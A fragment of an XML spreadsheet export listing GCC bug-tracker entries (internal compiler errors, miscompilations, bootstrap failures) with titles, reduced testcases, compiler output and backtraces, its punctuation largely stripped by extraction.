    <t>[4.3 Regression] ICE in vectorizable_type_demotion at tree-vect-transform.c:4098</t>
  </si>
  <si>
    <t>current SVN:
/home/marcus/projects/gcc/BIN/bin/gcc -m32 -c -O3 -ftree-vectorize -msse3   dosmem.i 
dosmem.i: In function 'DOSMEM_FillIsrTable':
dosmem.i:1: internal compiler error: in vectorizable_type_demotion at tree-vect-transform.c:4098
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-81534</t>
  </si>
  <si>
    <t>[7/8 Regression] ICE in in extract_insn at recog.c:2311 (unrecognizable insn)</t>
  </si>
  <si>
    <t>seen with gcc-7-branch 20170724 on s390x-linux-gnu. Looks like a variant of PR78738 and PR78748.
$ cat global_statistics.i
struct {
  short b
  long c
} a = {}
d() { __atomic_fetch_add( }
$ gcc -march=zEC12 -c -g -O2 global_statistics.i
global_statistics.i:4:1: warning: no semicolon at end of struct or union
 } a = {}
 ^
global_statistics.i:5:1: warning: return type defaults to 'int' [-Wimplicit-int]
 d() { __atomic_fetch_add( }
 ^
global_statistics.i: In function 'd':
global_statistics.i:5:1: error: unrecognizable insn:
(insn 21 20 22 4 (parallel [
            (set (reg:SI 71)
                (mem/v:SI (symbol_ref:DI (a) [flags 0x2] ) [-1  S4 A64]))
            (set (mem/v:SI (symbol_ref:DI (a) [flags 0x2] ) [-1  S4 A64])
                (unspec_volatile:SI [
                        (mem/v:SI (symbol_ref:DI (a) [flags 0x2] ) [-1  S4 A64])
                        (reg:SI 71)
                        (reg:SI 75)
                    ] UNSPECV_CAS))
            (set (reg:CCZ1 33 %cc)
                (compare:CCZ1 (mem/v:SI (symbol_ref:DI (a) [flags 0x2] ) [-1  S4 A64]) 
                    (reg:SI 71)))
        ]) global_statistics.i:5 -1
     (nil))
global_statistics.i:5:1: internal compiler error: in extract_insn at recog.c:2311
0x159681d _fatal_insn(char const* rtx_def const* char const* int char const*)
        ../../src/gcc/rtl-error.c:108
0x159685d _fatal_insn_not_found(rtx_def const* char const* int char const*)
        ../../src/gcc/rtl-error.c:116
0x1565907 extract_insn(rtx_insn*)
        ../../src/gcc/recog.c:2311
0x1382d29 instantiate_virtual_regs_in_insn
        ../../src/gcc/function.c:1637
0x1382d29 instantiate_virtual_regs
        ../../src/gcc/function.c:1957
0x1382d29 execute
        ../../src/gcc/function.c:2006
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-38275</t>
  </si>
  <si>
    <t>bootstrap failure when -ftree-parallelize-loops=4 is enabled</t>
  </si>
  <si>
    <t>When enabling -ftree-parallelize-loops=4  bootstrap fails:
cc1: warnings being treated as errors
../../gcc/gcc/dwarf2out.c: In function Ã¢dwarf2out_frame_debugÃ¢:
../../gcc/gcc/dwarf2out.c:2393: error: array subscript is above array 
bounds
../../gcc/gcc/dwarf2out.c:2394: error: array subscript is above array 
bounds
Further fetails are at 
http://gcc.gnu.org/ml/gcc/2008-11/msg00317.html
and a follow up by Zdenek at
http://gcc.gnu.org/ml/gcc/2008-11/msg00319.html</t>
  </si>
  <si>
    <t>GCC-48172</t>
  </si>
  <si>
    <t>[4.5 Regression] incorrect vectorization of loop in GCC 4.5.* with -O3</t>
  </si>
  <si>
    <t>When the following test case is compiled with -O3 the program fails to compute correct array values.  Compiling with -O2 allows the program to execute correctly.
Looking at the disassembly of the program the compiler appears to be vectorizing a loop (lines 25-27 in this example) incorrectly.  Turning off loop vectorization allows correct code generation (cc -O3 -fno-tree-vectorize works)
Problem was duplicated using gcc 4.5.0 4.5.1 and 4.5.2.  Problem does not occur using gcc 4.4.4 or 4.3.1.
The CPU being used is a 12-core Magny-Cours Opteron.
test case:
$ cat vec.c
// Compile with gcc -O3 to see failures
// Compile with gcc -O3 -fno-tree-vectorize to get correct results
#include 
#include 
#include 
#define ASIZE 1028
#define HALF (ASIZE/2)
int main() {
  uint32_t array[ASIZE]
  int failures
  int i
  memset(array 0 sizeof(array))
  // initialize first half of the array
  for (i = 0 i &lt; HALF i++) {
    array[i] = i
  }
  // fill second half of array in by summing earlier elements of the array
  // gcc 4.5.1 and 4.5.2 incorrectly vectorize this loop!  aray[1025] is left
  // at 0 for ASIZE=1028
  for (i = 0 i &lt; HALF-1 i++) {
    array[HALF+i] = array[2*i] + array[2*i + 1]
  }
  // see if we have any failures
  failures = 0
  for (i = 0 i &lt; HALF - 1 i++) {
    if (array[HALF+i] != array[2*i] + array[2*i + 1]) {
      printf(COMPILER BUG: array[%d] should be %d but is %d\n
             HALF+i array[2*i] + array[2*i + 1] array[HALF+i])
      ++failures
    }
  }
  if (failures == 0) {
    printf(pass\n)
  }
  return 0
}
$$ gcc --version
gcc (GCC) 4.5.2 20101216 (Cray Inc.)
Copyright (C) 2010 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ gcc -O3 vec.c  ./a.out
COMPILER BUG: array[1025] should be 98177 but is 0
$ gcc -O3 -fno-tree-vectorize vec.c  ./a.out 
pass
$ gcc -O2 vec.c  ./a.out
pass
$
  GCC 4.4.4 works:
$ gcc --version
gcc (GCC) 4.4.4 20100429 (Cray Inc.)
Copyright (C) 2010 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ gcc -O3 vec.c  ./a.out
pass
$</t>
  </si>
  <si>
    <t>GCC-13807</t>
  </si>
  <si>
    <t>cc1 segfaults compiling specific thumb code</t>
  </si>
  <si>
    <t>Summary:
Compiling the attached particular piece of code as thumb at -O2 causes the 
compiler to seg fault inside asm_fprintf. It has been reproduced using gcc 
3.3.2 on cygwin and gcc 3.3.1 on macos x. All were compiled using the same 
options.
Release:
gcc 3.3.2 release
Environment:
Linux version 2.4.22-gentoo-r4 (root@varmit) (gcc version 3.2.3 20030422 
(Gentoo Linux 1.4 3.2.3-r3 propolice)) #1 SMP Sat Jan 10 17:26:16 PST 2004
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: arm-elf
Configured with: ../gcc-3.3.2/configure --prefix=/usr/local/armdev-3.3.2 --
target=arm-elf --program-prefix=arm-elf- --program-suffix=332 --with-newlib --
enable-languages=c
Thread model: single
gcc version 3.3.2
to repeat (where pco_trace.i is the attached file):
arm-elf-gcc332 -v --save-temps -c -mthumb -fno-builtin -O2 -W -Wall -mthumb-
interwork -fsigned-char -funsigned-bitfields -o pco_trace.o pco_trace.i
output is:
Reading specs from /usr/local/armdev-3.3.2-withsuffix/bin/../lib/gcc-lib/arm-
elf/3.3.2/specs
Configured with: ../gcc-3.3.2/configure --prefix=/usr/local/armdev-3.3.2 --
target=arm-elf --program-prefix=arm-elf- --program-suffix=332 --with-newlib --
enable-languages=c
Thread model: single
gcc version 3.3.2
 /usr/local/armdev-3.3.2-withsuffix/bin/../lib/gcc-lib/arm-elf/3.3.2/cc1 -
fpreprocessed pco_trace.i -quiet -dumpbase pco_trace.i -mthumb -mthumb-
interwork -auxbase-strip pco_trace.o -O2 -W -Wall -version -fno-builtin -
fsigned-char -funsigned-bitfields -o pco_trace.s
GNU C version 3.3.2 (arm-elf)
        compiled by GNU C version 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3 
propolice).
GGC heuristics: --param ggc-min-expand=98 --param ggc-min-heapsize=129117
pco_trace.c: In function `read_str2ind_file':
pco_trace.c:147: warning: enumeration value `SCAN_SPACE' not handled in switch
pco_trace.c:58: warning: `fd' might be used uninitialized in this function
pco_trace.c:153: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>travis</t>
  </si>
  <si>
    <t>GCC-58725</t>
  </si>
  <si>
    <t>segfault with non-static member initializer in a nested struct</t>
  </si>
  <si>
    <t>The short code below that involves a non-static member initializer in a class nested in a template class nested in another class causes g++ to segfault. Seems to require this particular combination of features. It crashes with or without -std=c++11. (Without -std=c++11 it notes the error but then crashes after.) and independent of optimization level. Output below is with -std=c++11.
t.cpp
-----
struct A { //only happens if B is wrapped in another struct
    template //only happens if B is a template
    struct B {
        struct C {
            int x = 0
            double y = x //this line must be present to produce the problem
        } c //only happens if B contains a C object
    }
}
int main() {
    A::B()
}
------
$ g++ -v -save-temps -std=c++11 t.cpp
Using built-in specs.
COLLECT_GCC=/usr/local/gcc48/bin/g++
COLLECT_LTO_WRAPPER=/usr/local/gcc-4.8.1/libexec/gcc/x86_64-unknown-linux-gnu/4.8.1/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --enable-threads=posix --enable-__cxa_atexit --prefix=/usr/local/gcc-4.8.1
Thread model: posix
gcc version 4.8.1 (GCC)
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-std=c++11' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/local/gcc-4.8.1/libexec/gcc/x86_64-unknown-linux-gnu/4.8.1/cc1plus -E -quiet -v -D_GNU_SOURCE t.cpp -mtune=generic -march=x86-64 -std=c++11 -fpch-preprocess -o t.ii
ignoring nonexistent directory /usr/local/gcc-4.8.1/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/gcc-4.8.1/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../include/c++/4.8.1
 /usr/local/gcc-4.8.1/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../include/c++/4.8.1/x86_64-unknown-linux-gnu
 /usr/local/gcc-4.8.1/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/../../../../include/c++/4.8.1/backward
 /usr/local/gcc-4.8.1/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/include
 /usr/local/include
 /usr/local/gcc-4.8.1/include
 /usr/local/gcc-4.8.1/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-std=c++11' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/local/gcc-4.8.1/libexec/gcc/x86_64-unknown-linux-gnu/4.8.1/cc1plus -fpreprocessed t.ii -quiet -dumpbase t.cpp -mtune=generic -march=x86-64 -auxbase t -std=c++11 -version -o t.s
GNU C++ (GCC) version 4.8.1 (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.8.1 GMP version 4.3.2 MPFR version 2.4.2-p1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (GCC) version 4.8.1 (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.8.1 GMP version 4.3.2 MPFR version 2.4.2-p1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 9381368e685e312c931bb6a2db2d568c
t.cpp: In constructor 'constexpr A::B::C::C()':
t.cpp:4:16: internal compiler error: Segmentation fault
         struct C {
                ^
0x89ffef crash_signal
	../.././gcc/toplev.c:332
0x7276e5 size_binop_loc(unsigned int tree_code tree_node* tree_node*)
	../.././gcc/fold-const.c:1431
0x765476 gimplify_compound_lval
	../.././gcc/gimplify.c:2267
0x761ad4 gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
	../.././gcc/gimplify.c:7145
0x7631c6 gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
	../.././gcc/gimplify.c:7804
0x76774f gimplify_modify_expr
	../.././gcc/gimplify.c:4902
0x761fc9 gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
	../.././gcc/gimplify.c:7193
0x763da6 gimplify_stmt(tree_node** gimple_statement_d**)
	../.././gcc/gimplify.c:5725
0x76181d gimplify_cleanup_point_expr
	../.././gcc/gimplify.c:5501
0x76181d gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
	../.././gcc/gimplify.c:7530
0x763da6 gimplify_stmt(tree_node** gimple_statement_d**)
	../.././gcc/gimplify.c:5725
0x761bdb gimplify_statement_list
	../.././gcc/gimplify.c:1561
0x761bdb gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
	../.././gcc/gimplify.c:7582
0x763da6 gimplify_stmt(tree_node** gimple_statement_d**)
	../.././gcc/gimplify.c:5725
0x764472 gimplify_bind_expr
	../.././gcc/gimplify.c:1253
0x761a6a gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
	../.././gcc/gimplify.c:7364
0x763da6 gimplify_stmt(tree_node** gimple_statement_d**)
	../.././gcc/gimplify.c:5725
0x76983d gimplify_body(tree_node* bool)
	../.././gcc/gimplify.c:8226
0x769a57 gimplify_function_tree(tree_node*)
	../.././gcc/gimplify.c:8358
0x66e82f cgraph_analyze_function
	../.././gcc/cgraphunit.c:658
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-29373</t>
  </si>
  <si>
    <t>implicit type declaration and contained function clash</t>
  </si>
  <si>
    <t>(this is a spinoff of PR29267)
schluter@pcl247:~/src/pr/29267&gt; cat t.f90
 implicit character*32 (a-z)
  CHARACTER(len=255) DIMENSION(12)  :: a
  a = reshape((/ to_string(1.0) /) (/ 1 2 /))
  print * a
  CONTAINS
    CHARACTER(32) FUNCTION to_string(x)
      REAL INTENT(in) :: x
      WRITE(to_string FMT=(F6.3)) x
    END FUNCTION
END PROGRAM
schluter@pcl247:~/src/pr/29267&gt; gfortran t.f90
 In file t.f90:6
    CHARACTER(32) FUNCTION to_string(x)
                                   1
 In file t.f90:3
  a = reshape((/ to_string(1.0) /) (/ 1 2 /))
                         2
Error: Procedure 'to_string' at (1) has an explicit interface and must not have attributes declared at (2)
 In file t.f90:6
    CHARACTER(32) FUNCTION to_string(x)
                         1
Error: Syntax error in data declaration at (1)
 In file t.f90:7
      REAL INTENT(in) :: x
                          1
Error: Unexpected data declaration statement in CONTAINS section at (1)
 In file t.f90:8
      WRITE(to_string FMT=(F6.3)) x
                    1
Error: Syntax error in WRITE statement at (1)
 In file t.f90:9
    END FUNCTION
      1
Error: Expecting END PROGRAM statement at (1)
schluter@pcl247:~/src/pr/29267&gt;</t>
  </si>
  <si>
    <t>GCC-60740</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE in extract_affine w/ -O2 -ftree-loop-linear</t>
  </si>
  <si>
    <t>At least gcc 4.8.2 and and 4.9.0-alpha20140330 fail to compile the following code snippet w/ -O2 -ftree-loop-linear on x86_64-pc-linux-gnu:
int **db6 = 0
void
k26(void)
{
  static int geb = 0
  int *a22 = 
  int **l30 = 
  int *c4b
  int ndf
  for (ndf = 0 ndf &lt;= 1 ++ndf)
    *c4b = (db6 == l30) 
}
% gcc-4.9.0-alpha20140330 -c -O2 -ftree-loop-linear testcase.c
crash1.c: In function 'k26':
crash1.c:4:1: internal compiler error: in extract_affine at graphite-sese-to-poly.c:846
 k26(void)
 ^
% gcc-4.8.2 -c -O2 -ftree-loop-linear testcase.c
crash1.c: In function 'k26':
crash1.c:4:1: internal compiler error: in extract_affine at graphite-sese-to-poly.c:827
 k26(void)
 ^
% gcc-4.7.3 -c -O2 -ftree-loop-linear testcase.c
% echo $?
I failed to reduce the testcase any further.</t>
  </si>
  <si>
    <t>GCC-25348</t>
  </si>
  <si>
    <t>ICE encoding zero sized struct array</t>
  </si>
  <si>
    <t>Testcase:
struct f
{
  int i
  struct{} g[4]
  int tt
}
char *e = @encode(struct f)</t>
  </si>
  <si>
    <t>GCC-28211</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 Regression] wrong linkage of template argument diagnostic could be improved</t>
  </si>
  <si>
    <t>Description: Error message on invalid code could be clearer.  Test case code is invalid because the linkage of the template argument is wrong (needs to be extern).  
testcase.cc (reduced from case by Ladd Van Tol  on xcode-users AT lists DOT apple DOT com):
template  class Helper { }
// extern const int foo
const int foo = 0
typedef Helper&lt;
Command: g++ -c testcase.cc
Output (g++ 4.0.1):
testcase.cc:4: error: missing '&gt;' to terminate the template argument list
testcase.cc:4: error: template argument 1 is invalid
testcase.cc:4: error: expected initializer before '&gt;' token
Output (g++ 4.2.0 20060610)
testcase.cc:4: error: template argument 1 is invalid
testcase.cc:4: error: invalid type in declaration before '' token
Remark: uncommenting the extern declaration make the case valid
Keyword: diagnostic
Severity: minor
Suggestion: template argument 1 is invalid because symbol does not have external linkage</t>
  </si>
  <si>
    <t>GCC-15804</t>
  </si>
  <si>
    <t>Illegal program not detected RM 3.8.1(2)</t>
  </si>
  <si>
    <t>(Debian bug #246386)
package Test_246386 is
   type T1(b: boolean) is record
     case (b) is             --ERROR: parentheses not allowed
        when others =&gt; null
     end case
   end record
end Test_246386
I expect something like:
test_246386.ads:3:10: parentheses not allowed RM 3.8.1(2)
But I get nothing.</t>
  </si>
  <si>
    <t>GCC-28139</t>
  </si>
  <si>
    <t>alias information for EH is wrong</t>
  </si>
  <si>
    <t>The store at the beginning of a catch block can use an alias set that is
allegedly disjoint from the one used to load that value.  When scheduling
this can cause the load to be moved before the store.</t>
  </si>
  <si>
    <t>GCC-66560</t>
  </si>
  <si>
    <t>Fails to generate ADDSUBPS</t>
  </si>
  <si>
    <t>The second testcase (bar_v4sf) fails to generate ADDSUBPS with -O2 -mavx.
--cut here--
typedef float v4sf __attribute__((vector_size(16)))
typedef int v4si __attribute__((vector_size(16)))
v4sf foo_v4sf (v4sf x v4sf y)
{
  v4sf tem0 = x - y
  v4sf tem1 = x + y
  return __builtin_shuffle (tem0 tem1 (v4si) { 0 5 2 7 })
}
v4sf bar_v4sf (v4sf x v4sf y)
{
  v4sf tem0 = x + y
  v4sf tem1 = x - y
  return __builtin_shuffle (tem0 tem1 (v4si) { 4 1 6 3 })
}
--cut here--
gcc -O2 -mavx:
        vaddps  %xmm1 %xmm0 %xmm2
        vsubps  %xmm1 %xmm0 %xmm0
        vblendps        $5 %xmm0 %xmm2 %xmm0
        ret
The combine pass says:
foo_v4sf:
Successfully matched this instruction:
(set (reg:V4SF 93 [ D.2156 ])
    (vec_merge:V4SF (plus:V4SF (reg/v:V4SF 91 [ x ])
            (reg:V4SF 22 xmm1 [ y ]))
        (minus:V4SF (reg/v:V4SF 91 [ x ])
            (reg:V4SF 22 xmm1 [ y ]))
        (const_int 10 [0xa])))
bar_v4sf:
Failed to match this instruction:
(set (reg:V4SF 93 [ D.2159 ])
    (vec_merge:V4SF (minus:V4SF (reg/v:V4SF 91 [ x ])
            (reg/v:V4SF 92 [ y ]))
        (plus:V4SF (reg/v:V4SF 91 [ x ])
            (reg/v:V4SF 92 [ y ]))
        (const_int 5 [0x5])))
Please note that similar testcases always generate expected ADDSUBPD:
--cut here--
typedef double v4df __attribute__((vector_size(32)))
typedef long long v4di __attribute__((vector_size(32)))
v4df foo_v4df (v4df x v4df y)
{
  v4df tem0 = x - y
  v4df tem1 = x + y
  return __builtin_shuffle (tem0 tem1 (v4di) { 0 5 2 7 })
}
v4df bar_v4df (v4df x v4df y)
{
  v4df tem0 = x + y
  v4df tem1 = x - y
  return __builtin_shuffle (tem0 tem1 (v4di) { 4 1 6 3 })
}
--cut here--
foo_v4df:
Successfully matched this instruction:
(set (reg:V4DF 93 [ D.2162 ])
    (vec_select:V4DF (vec_concat:V8DF (minus:V4DF (reg/v:V4DF 91 [ x ])
                (reg/v:V4DF 92 [ y ]))
            (plus:V4DF (reg/v:V4DF 91 [ x ])
                (reg/v:V4DF 92 [ y ])))
        (parallel [
                (const_int 0 [0])
                (const_int 5 [0x5])
                (const_int 2 [0x2])
                (const_int 7 [0x7])
            ])))
bar_v4df:
Successfully matched this instruction:
(set (reg:V4DF 93 [ D.2165 ])
    (vec_select:V4DF (vec_concat:V8DF (minus:V4DF (reg/v:V4DF 91 [ x ])
                (reg/v:V4DF 92 [ y ]))
            (plus:V4DF (reg/v:V4DF 91 [ x ])
                (reg/v:V4DF 92 [ y ])))
        (parallel [
                (const_int 0 [0])
                (const_int 5 [0x5])
                (const_int 2 [0x2])
                (const_int 7 [0x7])
            ])))</t>
  </si>
  <si>
    <t>GCC-7432</t>
  </si>
  <si>
    <t>Changed bitfield allocation strategy in g++ 3.1.1</t>
  </si>
  <si>
    <t>Attached test case expecting the size of complete structure C to be 16 bytes.
  struct C {
    char c
    int i : 67
    char d
  }
This is what been offered by GNU compiler for a long time. GCC 3.1.1 compiler gives another size of the structure (24 bytes).
I do not see any reason to enlarge space taken by the structure C moreover I do not see any ABI acknowledgment for this. 
So the bitfield allocation strategy looks to be erroneously changed.
Release:
3.1.1
Environment:
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure --enable-threads
How-To-Repeat:
$g++ foo.cpp
$a.out
Actuall results (output):
sizeof(C) = 24
offsetof(C d) = 17
Expected results (output):
sizeof(C) = 16
offsetof(C d) = 13</t>
  </si>
  <si>
    <t>grigory</t>
  </si>
  <si>
    <t>GCC-34780</t>
  </si>
  <si>
    <t>Bootstrapping libstdc++-v3 failed</t>
  </si>
  <si>
    <t>Bootstrapping libstdc++-v3 at revision 131520 failed with:
...
Making all in libsupc++
/bin/sh ../libtool --tag CXX --tag disable-shared --mode=compile /opt/gcc/i686-darwin/./gcc/xgcc -shared-libgcc -B/opt/gcc/i686-darwin/./gcc -nostdinc++ -L/opt/gcc/i686-darwin/i686-apple-darwin9/libstdc++-v3/src -L/opt/gcc/i686-darwin/i686-apple-darwin9/libstdc++-v3/src/.libs -B/opt/gcc/gcc4.3w/i686-apple-darwin9/bin/ -B/opt/gcc/gcc4.3w/i686-apple-darwin9/lib/ -isystem /opt/gcc/gcc4.3w/i686-apple-darwin9/include -isystem /opt/gcc/gcc4.3w/i686-apple-darwin9/sys-include -I/opt/gcc/gcc-4.3-work/libstdc++-v3/../gcc -I/opt/gcc/i686-darwin/i686-apple-darwin9/libstdc++-v3/include/i686-apple-darwin9 -I/opt/gcc/i686-darwin/i686-apple-darwin9/libstdc++-v3/include -I/opt/gcc/gcc-4.3-work/libstdc++-v3/libsupc++  -fno-implicit-templates -prefer-pic -Wall -Wextra -Wwrite-strings -Wcast-qual -Werror -fdiagnostics-show-location=once -fvisibility-inlines-hidden -ffunction-sections -fdata-sections  -O2 -g -g -O2    -c -o eh_call.lo ../../../../gcc-4.3-work/libstdc++-v3/libsupc++/eh_call.cc
libtool: compile:  /opt/gcc/i686-darwin/./gcc/xgcc -shared-libgcc -B/opt/gcc/i686-darwin/./gcc -nostdinc++ -L/opt/gcc/i686-darwin/i686-apple-darwin9/libstdc++-v3/src -L/opt/gcc/i686-darwin/i686-apple-darwin9/libstdc++-v3/src/.libs -B/opt/gcc/gcc4.3w/i686-apple-darwin9/bin/ -B/opt/gcc/gcc4.3w/i686-apple-darwin9/lib/ -isystem /opt/gcc/gcc4.3w/i686-apple-darwin9/include -isystem /opt/gcc/gcc4.3w/i686-apple-darwin9/sys-include -I/opt/gcc/gcc-4.3-work/libstdc++-v3/../gcc -I/opt/gcc/i686-darwin/i686-apple-darwin9/libstdc++-v3/include/i686-apple-darwin9 -I/opt/gcc/i686-darwin/i686-apple-darwin9/libstdc++-v3/include -I/opt/gcc/gcc-4.3-work/libstdc++-v3/libsupc++ -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -Werror -fdiagnostics-show-location=once -fvisibility-inlines-hidden -ffunction-sections -fdata-sections -O2 -g -g -O2 -c ../../../../gcc-4.3-work/libstdc++-v3/libsupc++/eh_call.cc  -fno-common -DPIC -o eh_call.o
cc1plus: warnings being treated as errors
/opt/gcc/gcc-4.3-work/libstdc++-v3/../gcc/unwind-pe.h:74: error: 'unsigned int size_of_encoded_value(unsigned char)' defined but not used
make[4]: *** [eh_call.lo] Error 1
make[3]: *** [all-recursive] Error 1
make[2]: *** [all] Error 2
make[1]: *** [all-target-libstdc++-v3] Error 2
make: *** [all] Error 2
Does anyone understand why
static unsigned int
size_of_encoded_value (unsigned char encoding)
is read as 'unsigned int size_of_encoded_value(unsigned char)'?</t>
  </si>
  <si>
    <t>GCC-28887</t>
  </si>
  <si>
    <t>[4.2 Regression] rejects valid code (bitfields and loops) with -O1 -fprefetch-loop-arrays</t>
  </si>
  <si>
    <t>Alleged bug goes away if ommitting -fprefetch-loop-arrays.
Trying to compile binutils-2.17.50.0.3 (gdb-6.4 also exhibits this alleged bug)
with gcc-trunk from 20060828 i get errors of the form:
make[3]: Entering directory
`/root/src/buildroot/build_x86_64/binutils-2.17.50.0.3-target/libiberty'
if [ x != x ]  then \
          mkdir pic \
        else true fi
touch stamp-picdir
if [ x != x ] then \
          x86_64-linux-uclibc-gcc -c -DHAVE_CONFIG_H -O2 -fPIC
-ftree-loop-optimize -ftree-vectorize -ftree-vect-loop-version -funroll-loops
-freorder-blocks -freorder-blocks-and-partition -mtune=nocona -march=nocona
-msse -msse2 -msse3 -mfpmath=sse -fprefetch-loop-arrays -funswitch-loops
-fbranch-target-load-optimize -ftree-loop-linear -ftree-loop-im
-ftree-loop-ivcanon -fgcse-after-reload -fvariable-expansion-in-unroller
-fivopts  -I.
-I/root/src/buildroot/toolchain_build_x86_64/binutils-2.17.50.0.3/libiberty/../include
 -W -Wall -pedantic -Wwrite-strings -Wstrict-prototypes -Wc++-compat 
/root/src/buildroot/toolchain_build_x86_64/binutils-2.17.50.0.3/libiberty/regex.c
-o pic/regex.o \
        else true fi
x86_64-linux-uclibc-gcc -c -DHAVE_CONFIG_H -O2 -fPIC -ftree-loop-optimize
-ftree-vectorize -ftree-vect-loop-version -funroll-loops -freorder-blocks
-freorder-blocks-and-partition -mtune=nocona -march=nocona -msse -msse2 -msse3
-mfpmath=sse -fprefetch-loop-arrays -funswitch-loops
-fbranch-target-load-optimize -ftree-loop-linear -ftree-loop-im
-ftree-loop-ivcanon -fgcse-after-reload -fvariable-expansion-in-unroller
-fivopts  -I.
-I/root/src/buildroot/toolchain_build_x86_64/binutils-2.17.50.0.3/libiberty/../include
 -W -Wall -pedantic -Wwrite-strings -Wstrict-prototypes -Wc++-compat
/root/src/buildroot/toolchain_build_x86_64/binutils-2.17.50.0.3/libiberty/regex.c
-o regex.o
/root/src/buildroot/toolchain_build_x86_64/binutils-2.17.50.0.3/libiberty/regex.c:
In function 'byte_re_match_2_internal':
/root/src/buildroot/toolchain_build_x86_64/binutils-2.17.50.0.3/libiberty/regex.c:5549:
error: cannot take address of bit-field 'match_null_string_p'
/root/src/buildroot/toolchain_build_x86_64/binutils-2.17.50.0.3/libiberty/regex.c:5549:
error: cannot take address of bit-field 'match_null_string_p'
/root/src/buildroot/toolchain_build_x86_64/binutils-2.17.50.0.3/libiberty/regex.c:5549:
error: cannot take address of bit-field 'match_null_string_p'
make[3]: *** [regex.o] Error 1
make[3]: Leaving directory
`/root/src/buildroot/build_x86_64/binutils-2.17.50.0.3-target/libiberty'
make[2]: *** [all-libiberty] Error 2
make[2]: Leaving directory
`/root/src/buildroot/build_x86_64/binutils-2.17.50.0.3-target'
make[1]: *** [all] Error 2
make[1]: Leaving directory
`/root/src/buildroot/build_x86_64/binutils-2.17.50.0.3-target'
make: ***
[/root/src/buildroot/build_x86_64/binutils-2.17.50.0.3-target/binutils/objdump]
Error 2
Reduced testcase:
# cat c.i                                                                           typedef long unsigned int size_t                                               struct re_pattern_buffer                                                        {
  size_t re_nsub
}
typedef enum
{
  start_memory
} re_opcode_t
typedef union
{
  struct
  {
    unsigned matched_something:1
  } bits
} byte_register_info_type
byte_re_match_2_internal (struct re_pattern_buffer *bufp)
{
  int mcnt
  size_t num_regs = bufp-&gt;re_nsub + 1
  byte_register_info_type *reg_info
  for (mcnt = 1 (unsigned) mcnt &lt; num_regs mcnt++)
    {
      ((reg_info[mcnt]).bits.matched_something) = 0
    }
}
x86_64-linux-uclibc-gcc -O1 -fprefetch-loop-arrays c.i -c -o regex.o -v 
Using built-in specs.
Target: x86_64-linux-uclibc
Configured with: /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/configure --prefix=/root/src/buildroot/build_x86_64/staging_dir --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=x86_64-linux-uclibc --enable-languages=cc++ --enable-shared --disable-__cxa_atexit --enable-target-optspace --with-gnu-ld --disable-nls --enable-threads --disable-multilib
Thread model: posix
gcc version 4.2.0 20060828 (experimental)
 /root/src/buildroot/build_x86_64/staging_dir/libexec/gcc/x86_64-linux-uclibc/4.2.0/cc1 -fpreprocessed c.i -quiet -dumpbase c.i -mtune=generic -auxbase-strip regex.o -O1 -version -fprefetch-loop-arrays -o /tmp/ccwSTKtj.s
GNU C version 4.2.0 20060828 (experimental) (x86_64-linux-uclibc)
        compiled by GNU C version 4.1.2 20060613 (prerelease) (Debian 4.1.1-5).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 7dbca204c110dec99203ab2b693d4e2f
c.i: In function 'byte_re_match_2_internal':
c.i:18: error: cannot take address of bit-field 'matched_something'
c.i:18: error: cannot take address of bit-field 'matched_something'
c.i:18: error: cannot take address of bit-field 'matched_something'</t>
  </si>
  <si>
    <t>GCC-7850</t>
  </si>
  <si>
    <t>g++-3.2 ends with Internal compiler error @ KDE 3.0.x</t>
  </si>
  <si>
    <t>Hello
First of all I`m not a programmer but a user. I tried to compile KDE via the ./configure --option1 --option2 &amp;&amp; make &amp;&amp; make install procedure. 
While compiling KDE 3.0.x g++-3.2 outputs the following message:
